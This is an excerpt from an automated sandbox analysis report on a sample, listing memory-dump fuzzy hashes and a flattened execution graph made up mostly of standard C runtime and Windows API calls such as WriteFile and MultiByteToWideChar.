                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49f1e75eebe2cc702301ff0625b436c8faa4c3a07efd95864f638f8c66b9fc68
                                                              • Instruction ID: ebd63f8b8663d46e67a3db0e5cea588288d6a8f5f6b5bb912bdad2b932c5ed1c
                                                              • Opcode Fuzzy Hash: 49f1e75eebe2cc702301ff0625b436c8faa4c3a07efd95864f638f8c66b9fc68
                                                              • Instruction Fuzzy Hash: 32E1D574E102198FCB14DFA9C9809AEBBF2FF89305F24826AD514AB359D734AD41CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65d350648a285f7224216b6382d95d7d9f3d1387e72611ff93ef6c5070701971
                                                              • Instruction ID: f34f479fba8d0232f00491a3a7126ab343cda6d70b947195c14552f31a04eb2a
                                                              • Opcode Fuzzy Hash: 65d350648a285f7224216b6382d95d7d9f3d1387e72611ff93ef6c5070701971
                                                              • Instruction Fuzzy Hash: C3E1F574E002198FCB14DFA9C9809AEFBF2FF89304F24816AD914AB355D775A942CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23c9d79167cf3490aa054d17ea9d6332d65c22b4b34656d62ba4f9a0902a8a2f
                                                              • Instruction ID: 2b3b9a42480326b5b61a32a10a2d6ca48df82a6b1eb9aa7ed3701169f4dfbb23
                                                              • Opcode Fuzzy Hash: 23c9d79167cf3490aa054d17ea9d6332d65c22b4b34656d62ba4f9a0902a8a2f
                                                              • Instruction Fuzzy Hash: 81E10774E142198FCB14DFA9C9809AEFBF2FF89304F24816AD914AB356D735A941CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c34b9d43e1576ae23e9fd23c4b03d47481096650b86ca930f080d2ac95bdfde4
                                                              • Instruction ID: fb66bd1c3aa330c1135407ad3e0651b073650d4aa7f855e4ce8a908efa4fa076
                                                              • Opcode Fuzzy Hash: c34b9d43e1576ae23e9fd23c4b03d47481096650b86ca930f080d2ac95bdfde4
                                                              • Instruction Fuzzy Hash: 60E1D474E042198FDB14DFA9C9809AEBBF2FF89304F24816AD515AB355DB34AD41CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a07650e9a548e4b12b2e1273b05e9c95fdebe96a64a034f0212170ba9d8ab91
                                                              • Instruction ID: 53f341e3f1fbc0a6c9864b4e0394efe2157fff64bc56a0ed6735beb98508cd82
                                                              • Opcode Fuzzy Hash: 1a07650e9a548e4b12b2e1273b05e9c95fdebe96a64a034f0212170ba9d8ab91
                                                              • Instruction Fuzzy Hash: B4E1F474E002198FDB14DFA9C9809AEBBF2FF89304F24816AD515AB355D734AD42CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 545155053dae59be47ca15a0582502704ac831f1803834cad200f75227ab4cd2
                                                              • Instruction ID: ea127e1a0584ef24eebe8ea33d161ab00ac8329ba470033598fc33f525ae594a
                                                              • Opcode Fuzzy Hash: 545155053dae59be47ca15a0582502704ac831f1803834cad200f75227ab4cd2
                                                              • Instruction Fuzzy Hash: 5DE10574E042198FCB14DFA8D5809AEBBF2FF88304F24C169E419AB356D734A941CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81426c33eed7033b45170e41812746eb2fb2ff0910b5a3ad208b8230c299532c
                                                              • Instruction ID: 8a5dd6fd0017389ebe6168c50c10f5e24e7c9e5f54f59ca4152b209537a88609
                                                              • Opcode Fuzzy Hash: 81426c33eed7033b45170e41812746eb2fb2ff0910b5a3ad208b8230c299532c
                                                              • Instruction Fuzzy Hash: 17E12874E042198FCB14DFA9D5809AEFBF2FF89304F248169E805AB356D734A941CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44364ff32f2f9dc849ab87c5e41b822746fdb4600aef132e4f61b94345786e05
                                                              • Instruction ID: a2f171d9beb6e9a4330b7a9cd8d9acb5690cffd99d9b1c68c7d3a6e68886a7a2
                                                              • Opcode Fuzzy Hash: 44364ff32f2f9dc849ab87c5e41b822746fdb4600aef132e4f61b94345786e05
                                                              • Instruction Fuzzy Hash: CEE11574E042598FCB14DFA9D5809AEBBF2FF89304F24C169E419AB356D734A941CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8359c84f5f9926e10ccc40c38355e927976e5436422f72db7c429950e321ee7
                                                              • Instruction ID: b7c980657754730f213a6cbe4cc26c57c57d5b3c95ce3613676cb4246984c6e2
                                                              • Opcode Fuzzy Hash: a8359c84f5f9926e10ccc40c38355e927976e5436422f72db7c429950e321ee7
                                                              • Instruction Fuzzy Hash: FFE1F774E041598FCB14DFA9D5809AEFBF2FF89304F248169E415AB35AD734A942CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb2827f52a94d4f9baa993aa0a76773798d17ebd825a2124bb14bdd293ebf1db
                                                              • Instruction ID: b8b1bb829212a2d89932f62e80deb0552b0896d6d90352a8630b8a5805faa699
                                                              • Opcode Fuzzy Hash: cb2827f52a94d4f9baa993aa0a76773798d17ebd825a2124bb14bdd293ebf1db
                                                              • Instruction Fuzzy Hash: 95A17E32E002298FCF15DFB4C8845AEB7B7FF84304B1545AAE805AB265DB71E959CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d6382d3123a0360650de7d532ad739a268183beeed97edd90fa6f6e36154733
                                                              • Instruction ID: 09a0c12349f83a6041855f171414eeb7d5b111e1427caf7dd7a30e7149d30b42
                                                              • Opcode Fuzzy Hash: 0d6382d3123a0360650de7d532ad739a268183beeed97edd90fa6f6e36154733
                                                              • Instruction Fuzzy Hash: BD718E74E056188FCB04DFAAD9849AEFBF2BF88311F14C166D419BB255D734A942CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4eced99b4b26ef92d0b36922e13c9a069756dbd6b534946a1da42ec005777d86
                                                              • Instruction ID: a70f7cca23b666bfaf946d81d3626ca9970e39f87179239fe384ad09f8851b40
                                                              • Opcode Fuzzy Hash: 4eced99b4b26ef92d0b36922e13c9a069756dbd6b534946a1da42ec005777d86
                                                              • Instruction Fuzzy Hash: 4F519F75E016189FDB04DFEAD9446EEBBF2FF88311F10802AE919AB254DB345A46CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d526909573f6c52e0ea3517b78b31f2232b6bf6fefa3143809f8bc17d4ff234a
                                                              • Instruction ID: 9151dc2465f29b97b5a07a1342d778555c133087e7cbfd17fa01da0df6657ad2
                                                              • Opcode Fuzzy Hash: d526909573f6c52e0ea3517b78b31f2232b6bf6fefa3143809f8bc17d4ff234a
                                                              • Instruction Fuzzy Hash: B5519FB5E046188FDB48DFAAD98459EFBF2FF88310F14C06AD819AB354DB349942CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a32c96fba58070fa09626d08292640be19d812157b61968dd324eed36c59c11
                                                              • Instruction ID: 6a150695d3ef61a4617f3a0821d221555db9e1645fc801258b17f4afdbc7516b
                                                              • Opcode Fuzzy Hash: 7a32c96fba58070fa09626d08292640be19d812157b61968dd324eed36c59c11
                                                              • Instruction Fuzzy Hash: 2241D8B0E006188FEB58DF6AD84179EBBF2FFC8300F14C0A9D45CAB255EA345A858F51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 338c8ad6935514d3669031a3a28e896c6441727de61692f272edf4f3a5a3999c
                                                              • Instruction ID: 51a6031b3ae314328053e6a222304c1f36c94518c3ed94355ad65f35d5965d45
                                                              • Opcode Fuzzy Hash: 338c8ad6935514d3669031a3a28e896c6441727de61692f272edf4f3a5a3999c
                                                              • Instruction Fuzzy Hash: DB41A2B5E006089FDB08DFEAD98469EFBF2AF88310F14C06AD519AB255DB345946CF50

                                                              Execution Graph

                                                              Execution Coverage: 2.6%
                                                              Dynamic/Decrypted Code Coverage: 100%
                                                              Signature Coverage: 2.6%
                                                              Total number of Nodes: 1668
                                                              Total number of Limit Nodes: 5
6802->6815 6805 1000a0be 6803->6805 6807 100062ac ___std_exception_copy 26 API calls 6805->6807 6806 1000a0ea 6816 1000a026 6806->6816 6807->6811 6809 1000a0f5 6832 1000a112 6809->6832 6811->6769 7080 100056b9 RtlLeaveCriticalSection 6812->7080 6814 1000907a 6814->6770 6815->6806 6817 1000a033 6816->6817 6818 1000a048 6816->6818 6819 10006368 __dosmaperr 20 API calls 6817->6819 6824 1000a043 6818->6824 6835 10008e12 6818->6835 6820 1000a038 6819->6820 6822 100062ac ___std_exception_copy 26 API calls 6820->6822 6822->6824 6824->6809 6825 1000907c 20 API calls 6826 1000a064 6825->6826 6841 10007a5a 6826->6841 6828 1000a06a 6848 1000adce 6828->6848 6831 1000571e _free 20 API calls 6831->6824 7079 10007ba8 RtlLeaveCriticalSection 6832->7079 6834 1000a11a 6834->6811 6836 10008e2a 6835->6836 6837 10008e26 6835->6837 6836->6837 6838 10007a5a 26 API calls 6836->6838 6837->6825 6839 10008e4a 6838->6839 6863 10009a22 6839->6863 6842 10007a66 6841->6842 6843 10007a7b 6841->6843 6844 10006368 __dosmaperr 20 API calls 6842->6844 6843->6828 6845 10007a6b 6844->6845 6846 100062ac ___std_exception_copy 26 API calls 6845->6846 6847 10007a76 6846->6847 6847->6828 6849 1000adf2 6848->6849 6850 1000addd 6848->6850 6851 1000ae2d 6849->6851 6856 1000ae19 6849->6856 6852 10006355 __dosmaperr 20 API calls 6850->6852 6853 10006355 __dosmaperr 20 API calls 6851->6853 6854 1000ade2 6852->6854 6857 1000ae32 6853->6857 6855 10006368 __dosmaperr 20 API calls 6854->6855 6860 1000a070 6855->6860 7036 1000ada6 6856->7036 6859 10006368 __dosmaperr 20 API calls 6857->6859 6861 1000ae3a 6859->6861 6860->6824 6860->6831 6862 100062ac ___std_exception_copy 26 API calls 6861->6862 6862->6860 6864 10009a2e ___DestructExceptionObject 6863->6864 6865 10009a36 6864->6865 6866 10009a4e 6864->6866 6888 10006355 6865->6888 6868 10009aec 6866->6868 6872 10009a83 6866->6872 6870 10006355 __dosmaperr 20 API calls 6868->6870 6873 10009af1 6870->6873 6871 10006368 __dosmaperr 20 API calls 6874 10009a43 _abort 
6871->6874 6891 10008c7b RtlEnterCriticalSection 6872->6891 6876 10006368 __dosmaperr 20 API calls 6873->6876 6874->6837 6878 10009af9 6876->6878 6877 10009a89 6879 10009aa5 6877->6879 6880 10009aba 6877->6880 6881 100062ac ___std_exception_copy 26 API calls 6878->6881 6882 10006368 __dosmaperr 20 API calls 6879->6882 6892 10009b0d 6880->6892 6881->6874 6884 10009aaa 6882->6884 6886 10006355 __dosmaperr 20 API calls 6884->6886 6885 10009ab5 6943 10009ae4 6885->6943 6886->6885 6889 10005b7a __dosmaperr 20 API calls 6888->6889 6890 1000635a 6889->6890 6890->6871 6891->6877 6893 10009b34 6892->6893 6894 10009b3b 6892->6894 6898 10002ada _ValidateLocalCookies 5 API calls 6893->6898 6895 10009b5e 6894->6895 6896 10009b3f 6894->6896 6900 10009baf 6895->6900 6901 10009b92 6895->6901 6897 10006355 __dosmaperr 20 API calls 6896->6897 6899 10009b44 6897->6899 6902 10009d15 6898->6902 6903 10006368 __dosmaperr 20 API calls 6899->6903 6904 10009bc5 6900->6904 6946 1000a00b 6900->6946 6905 10006355 __dosmaperr 20 API calls 6901->6905 6902->6885 6906 10009b4b 6903->6906 6949 100096b2 6904->6949 6909 10009b97 6905->6909 6910 100062ac ___std_exception_copy 26 API calls 6906->6910 6912 10006368 __dosmaperr 20 API calls 6909->6912 6910->6893 6913 10009b9f 6912->6913 6916 100062ac ___std_exception_copy 26 API calls 6913->6916 6914 10009bd3 6919 10009bd7 6914->6919 6920 10009bf9 6914->6920 6915 10009c0c 6917 10009c20 6915->6917 6918 10009c66 WriteFile 6915->6918 6916->6893 6923 10009c56 6917->6923 6924 10009c28 6917->6924 6921 10009c89 GetLastError 6918->6921 6926 10009bef 6918->6926 6925 10009ccd 6919->6925 6956 10009645 6919->6956 6961 10009492 GetConsoleCP 6920->6961 6921->6926 6987 10009728 6923->6987 6927 10009c46 6924->6927 6928 10009c2d 6924->6928 6925->6893 6931 10006368 __dosmaperr 20 API calls 6925->6931 6926->6893 6926->6925 6934 10009ca9 6926->6934 6979 100098f5 6927->6979 6928->6925 6972 10009807 6928->6972 6933 10009cf2 6931->6933 6936 10006355 __dosmaperr 20 API calls 
6933->6936 6937 10009cb0 6934->6937 6938 10009cc4 6934->6938 6936->6893 6939 10006368 __dosmaperr 20 API calls 6937->6939 6994 10006332 6938->6994 6941 10009cb5 6939->6941 6942 10006355 __dosmaperr 20 API calls 6941->6942 6942->6893 7035 10008c9e RtlLeaveCriticalSection 6943->7035 6945 10009aea 6945->6874 6999 10009f8d 6946->6999 7021 10008dbc 6949->7021 6951 100096c2 6952 100096c7 6951->6952 6953 10005af6 _abort 38 API calls 6951->6953 6952->6914 6952->6915 6954 100096ea 6953->6954 6954->6952 6955 10009708 GetConsoleMode 6954->6955 6955->6952 6959 1000966a 6956->6959 6960 1000969f 6956->6960 6957 1000a181 WriteConsoleW CreateFileW 6957->6959 6958 100096a1 GetLastError 6958->6960 6959->6957 6959->6958 6959->6960 6960->6926 6965 100094f5 6961->6965 6971 10009607 6961->6971 6962 10002ada _ValidateLocalCookies 5 API calls 6963 10009641 6962->6963 6963->6926 6966 1000957b WideCharToMultiByte 6965->6966 6968 100079e6 40 API calls __fassign 6965->6968 6970 100095d2 WriteFile 6965->6970 6965->6971 7030 10007c19 6965->7030 6967 100095a1 WriteFile 6966->6967 6966->6971 6967->6965 6969 1000962a GetLastError 6967->6969 6968->6965 6969->6971 6970->6965 6970->6969 6971->6962 6974 10009816 6972->6974 6973 100098d8 6976 10002ada _ValidateLocalCookies 5 API calls 6973->6976 6974->6973 6975 10009894 WriteFile 6974->6975 6975->6974 6977 100098da GetLastError 6975->6977 6978 100098f1 6976->6978 6977->6973 6978->6926 6986 10009904 6979->6986 6980 10009a0f 6981 10002ada _ValidateLocalCookies 5 API calls 6980->6981 6983 10009a1e 6981->6983 6982 10009986 WideCharToMultiByte 6984 10009a07 GetLastError 6982->6984 6985 100099bb WriteFile 6982->6985 6983->6926 6984->6980 6985->6984 6985->6986 6986->6980 6986->6982 6986->6985 6988 10009737 6987->6988 6989 100097ea 6988->6989 6990 100097a9 WriteFile 6988->6990 6991 10002ada _ValidateLocalCookies 5 API calls 6989->6991 6990->6988 6992 100097ec GetLastError 6990->6992 6993 10009803 6991->6993 6992->6989 6993->6926 6995 10006355 __dosmaperr 20 
API calls 6994->6995 6996 1000633d __dosmaperr 6995->6996 6997 10006368 __dosmaperr 20 API calls 6996->6997 6998 10006350 6997->6998 6998->6893 7008 10008d52 6999->7008 7001 10009f9f 7002 10009fa7 7001->7002 7003 10009fb8 SetFilePointerEx 7001->7003 7004 10006368 __dosmaperr 20 API calls 7002->7004 7005 10009fd0 GetLastError 7003->7005 7007 10009fac 7003->7007 7004->7007 7006 10006332 __dosmaperr 20 API calls 7005->7006 7006->7007 7007->6904 7009 10008d74 7008->7009 7010 10008d5f 7008->7010 7013 10006355 __dosmaperr 20 API calls 7009->7013 7015 10008d99 7009->7015 7011 10006355 __dosmaperr 20 API calls 7010->7011 7012 10008d64 7011->7012 7014 10006368 __dosmaperr 20 API calls 7012->7014 7016 10008da4 7013->7016 7017 10008d6c 7014->7017 7015->7001 7018 10006368 __dosmaperr 20 API calls 7016->7018 7017->7001 7019 10008dac 7018->7019 7020 100062ac ___std_exception_copy 26 API calls 7019->7020 7020->7017 7022 10008dd6 7021->7022 7023 10008dc9 7021->7023 7025 10008de2 7022->7025 7026 10006368 __dosmaperr 20 API calls 7022->7026 7024 10006368 __dosmaperr 20 API calls 7023->7024 7027 10008dce 7024->7027 7025->6951 7028 10008e03 7026->7028 7027->6951 7029 100062ac ___std_exception_copy 26 API calls 7028->7029 7029->7027 7031 10005af6 _abort 38 API calls 7030->7031 7032 10007c24 7031->7032 7033 10007a00 __fassign 38 API calls 7032->7033 7034 10007c34 7033->7034 7034->6965 7035->6945 7039 1000ad24 7036->7039 7038 1000adca 7038->6860 7040 1000ad30 ___DestructExceptionObject 7039->7040 7050 10008c7b RtlEnterCriticalSection 7040->7050 7042 1000ad3e 7043 1000ad70 7042->7043 7044 1000ad65 7042->7044 7046 10006368 __dosmaperr 20 API calls 7043->7046 7051 1000ae4d 7044->7051 7047 1000ad6b 7046->7047 7066 1000ad9a 7047->7066 7049 1000ad8d _abort 7049->7038 7050->7042 7052 10008d52 26 API calls 7051->7052 7054 1000ae5d 7052->7054 7053 1000ae63 7069 10008cc1 7053->7069 7054->7053 7056 1000ae95 7054->7056 7059 10008d52 26 API calls 7054->7059 7056->7053 7057 10008d52 26 API calls 
7056->7057 7060 1000aea1 CloseHandle 7057->7060 7062 1000ae8c 7059->7062 7060->7053 7064 1000aead GetLastError 7060->7064 7061 1000aedd 7061->7047 7063 10008d52 26 API calls 7062->7063 7063->7056 7064->7053 7065 10006332 __dosmaperr 20 API calls 7065->7061 7078 10008c9e RtlLeaveCriticalSection 7066->7078 7068 1000ada4 7068->7049 7070 10008cd0 7069->7070 7071 10008d37 7069->7071 7070->7071 7076 10008cfa 7070->7076 7072 10006368 __dosmaperr 20 API calls 7071->7072 7073 10008d3c 7072->7073 7074 10006355 __dosmaperr 20 API calls 7073->7074 7075 10008d27 7074->7075 7075->7061 7075->7065 7076->7075 7077 10008d21 SetStdHandle 7076->7077 7077->7075 7078->7068 7079->6834 7080->6814 7081 10002049 7082 10002055 ___DestructExceptionObject 7081->7082 7083 100020d3 7082->7083 7084 1000207d 7082->7084 7094 1000205e 7082->7094 7085 10002639 ___scrt_fastfail 4 API calls 7083->7085 7095 1000244c 7084->7095 7087 100020da 7085->7087 7088 10002082 7104 10002308 7088->7104 7090 10002087 __RTC_Initialize 7107 100020c4 7090->7107 7092 1000209f 7110 1000260b 7092->7110 7096 10002451 ___scrt_release_startup_lock 7095->7096 7097 10002461 7096->7097 7098 10002455 7096->7098 7101 1000246e 7097->7101 7102 1000499b _abort 28 API calls 7097->7102 7099 1000527a _abort 20 API calls 7098->7099 7100 1000245f 7099->7100 7100->7088 7101->7088 7103 10004bbd 7102->7103 7103->7088 7116 100034c7 RtlInterlockedFlushSList 7104->7116 7106 10002312 7106->7090 7118 1000246f 7107->7118 7109 100020c9 ___scrt_release_startup_lock 7109->7092 7111 10002617 7110->7111 7112 1000262d 7111->7112 7137 100053ed 7111->7137 7112->7094 7115 10003529 ___vcrt_uninitialize 8 API calls 7115->7112 7117 100034d7 7116->7117 7117->7106 7123 100053ff 7118->7123 7121 1000391b ___vcrt_uninitialize_ptd 6 API calls 7122 1000354d 7121->7122 7122->7109 7126 10005c2b 7123->7126 7127 10005c35 7126->7127 7129 10002476 7126->7129 7130 10005db2 7127->7130 7129->7121 7131 10005c45 _abort 5 API calls 7130->7131 7132 10005dd9 7131->7132 7133 
10005df1 TlsFree 7132->7133 7134 10005de5 7132->7134 7133->7134 7135 10002ada _ValidateLocalCookies 5 API calls 7134->7135 7136 10005e02 7135->7136 7136->7129 7140 100074da 7137->7140 7143 100074f3 7140->7143 7141 10002ada _ValidateLocalCookies 5 API calls 7142 10002625 7141->7142 7142->7115 7143->7141 7277 10008a89 7280 10006d60 7277->7280 7281 10006d69 7280->7281 7282 10006d72 7280->7282 7284 10006c5f 7281->7284 7285 10005af6 _abort 38 API calls 7284->7285 7286 10006c6c 7285->7286 7287 10006d7e __fassign 38 API calls 7286->7287 7288 10006c74 7287->7288 7304 100069f3 7288->7304 7291 10006c8b 7291->7282 7294 10006cce 7297 1000571e _free 20 API calls 7294->7297 7297->7291 7298 10006cc9 7299 10006368 __dosmaperr 20 API calls 7298->7299 7299->7294 7300 10006d12 7300->7294 7328 100068c9 7300->7328 7301 10006ce6 7301->7300 7302 1000571e _free 20 API calls 7301->7302 7302->7300 7305 100054a7 __fassign 38 API calls 7304->7305 7306 10006a05 7305->7306 7307 10006a14 GetOEMCP 7306->7307 7308 10006a26 7306->7308 7310 10006a3d 7307->7310 7309 10006a2b GetACP 7308->7309 7308->7310 7309->7310 7310->7291 7311 100056d0 7310->7311 7312 1000570e 7311->7312 7313 100056de _abort 7311->7313 7314 10006368 __dosmaperr 20 API calls 7312->7314 7313->7312 7315 100056f9 RtlAllocateHeap 7313->7315 7317 1000474f _abort 7 API calls 7313->7317 7316 1000570c 7314->7316 7315->7313 7315->7316 7316->7294 7318 10006e20 7316->7318 7317->7313 7319 100069f3 40 API calls 7318->7319 7320 10006e3f 7319->7320 7323 10006e90 IsValidCodePage 7320->7323 7325 10006e46 7320->7325 7327 10006eb5 ___scrt_fastfail 7320->7327 7321 10002ada _ValidateLocalCookies 5 API calls 7322 10006cc1 7321->7322 7322->7298 7322->7301 7324 10006ea2 GetCPInfo 7323->7324 7323->7325 7324->7325 7324->7327 7325->7321 7331 10006acb GetCPInfo 7327->7331 7404 10006886 7328->7404 7330 100068ed 7330->7294 7332 10006baf 7331->7332 7338 10006b05 7331->7338 7335 10002ada _ValidateLocalCookies 5 API calls 7332->7335 7337 10006c5b 7335->7337 
7337->7325 7341 100086e4 7338->7341 7340 10008a3e 43 API calls 7340->7332 7342 100054a7 __fassign 38 API calls 7341->7342 7343 10008704 MultiByteToWideChar 7342->7343 7345 10008742 7343->7345 7346 100087da 7343->7346 7348 100056d0 21 API calls 7345->7348 7352 10008763 ___scrt_fastfail 7345->7352 7347 10002ada _ValidateLocalCookies 5 API calls 7346->7347 7349 10006b66 7347->7349 7348->7352 7355 10008a3e 7349->7355 7350 100087d4 7360 10008801 7350->7360 7352->7350 7353 100087a8 MultiByteToWideChar 7352->7353 7353->7350 7354 100087c4 GetStringTypeW 7353->7354 7354->7350 7356 100054a7 __fassign 38 API calls 7355->7356 7357 10008a51 7356->7357 7364 10008821 7357->7364 7361 1000880d 7360->7361 7362 1000881e 7360->7362 7361->7362 7363 1000571e _free 20 API calls 7361->7363 7362->7346 7363->7362 7366 1000883c 7364->7366 7365 10008862 MultiByteToWideChar 7367 1000888c 7365->7367 7378 10008a16 7365->7378 7366->7365 7372 100056d0 21 API calls 7367->7372 7374 100088ad 7367->7374 7368 10002ada _ValidateLocalCookies 5 API calls 7369 10006b87 7368->7369 7369->7340 7370 100088f6 MultiByteToWideChar 7371 10008962 7370->7371 7373 1000890f 7370->7373 7376 10008801 __freea 20 API calls 7371->7376 7372->7374 7391 10005f19 7373->7391 7374->7370 7374->7371 7376->7378 7378->7368 7379 10008971 7381 100056d0 21 API calls 7379->7381 7384 10008992 7379->7384 7380 10008939 7380->7371 7382 10005f19 11 API calls 7380->7382 7381->7384 7382->7371 7383 10008a07 7386 10008801 __freea 20 API calls 7383->7386 7384->7383 7385 10005f19 11 API calls 7384->7385 7387 100089e6 7385->7387 7386->7371 7387->7383 7388 100089f5 WideCharToMultiByte 7387->7388 7388->7383 7389 10008a35 7388->7389 7390 10008801 __freea 20 API calls 7389->7390 7390->7371 7392 10005c45 _abort 5 API calls 7391->7392 7393 10005f40 7392->7393 7396 10005f49 7393->7396 7399 10005fa1 7393->7399 7397 10002ada _ValidateLocalCookies 5 API calls 7396->7397 7398 10005f9b 7397->7398 7398->7371 7398->7379 7398->7380 7400 10005c45 _abort 5 API 
calls 7399->7400 7401 10005fc8 7400->7401 7402 10002ada _ValidateLocalCookies 5 API calls 7401->7402 7403 10005f89 LCMapStringW 7402->7403 7403->7396 7405 10006892 ___DestructExceptionObject 7404->7405 7412 10005671 RtlEnterCriticalSection 7405->7412 7407 1000689c 7413 100068f1 7407->7413 7411 100068b5 _abort 7411->7330 7412->7407 7425 10007011 7413->7425 7415 1000693f 7416 10007011 26 API calls 7415->7416 7417 1000695b 7416->7417 7418 10007011 26 API calls 7417->7418 7419 10006979 7418->7419 7420 100068a9 7419->7420 7421 1000571e _free 20 API calls 7419->7421 7422 100068bd 7420->7422 7421->7420 7439 100056b9 RtlLeaveCriticalSection 7422->7439 7424 100068c7 7424->7411 7426 10007022 7425->7426 7435 1000701e 7425->7435 7427 10007029 7426->7427 7431 1000703c ___scrt_fastfail 7426->7431 7428 10006368 __dosmaperr 20 API calls 7427->7428 7429 1000702e 7428->7429 7430 100062ac ___std_exception_copy 26 API calls 7429->7430 7430->7435 7432 10007073 7431->7432 7433 1000706a 7431->7433 7431->7435 7432->7435 7437 10006368 __dosmaperr 20 API calls 7432->7437 7434 10006368 __dosmaperr 20 API calls 7433->7434 7436 1000706f 7434->7436 7435->7415 7438 100062ac ___std_exception_copy 26 API calls 7436->7438 7437->7436 7438->7435 7439->7424 6113 1000220c 6114 10002215 6113->6114 6115 1000221a dllmain_dispatch 6113->6115 6117 100022b1 6114->6117 6118 100022c7 6117->6118 6120 100022d0 6118->6120 6121 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6118->6121 6120->6115 6121->6120 7144 1000724e GetProcessHeap 7145 1000284f 7146 10002882 std::exception::exception 27 API calls 7145->7146 7147 1000285d 7146->7147 7444 10003c90 RtlUnwind 7542 100036d0 7543 100036e2 7542->7543 7545 100036f0 @_EH4_CallFilterFunc@8 7542->7545 7544 10002ada _ValidateLocalCookies 5 API calls 7543->7544 7544->7545 7148 10005351 7149 10005360 7148->7149 7153 10005374 7148->7153 7151 1000571e _free 20 API calls 7149->7151 7149->7153 7150 1000571e _free 20 API calls 
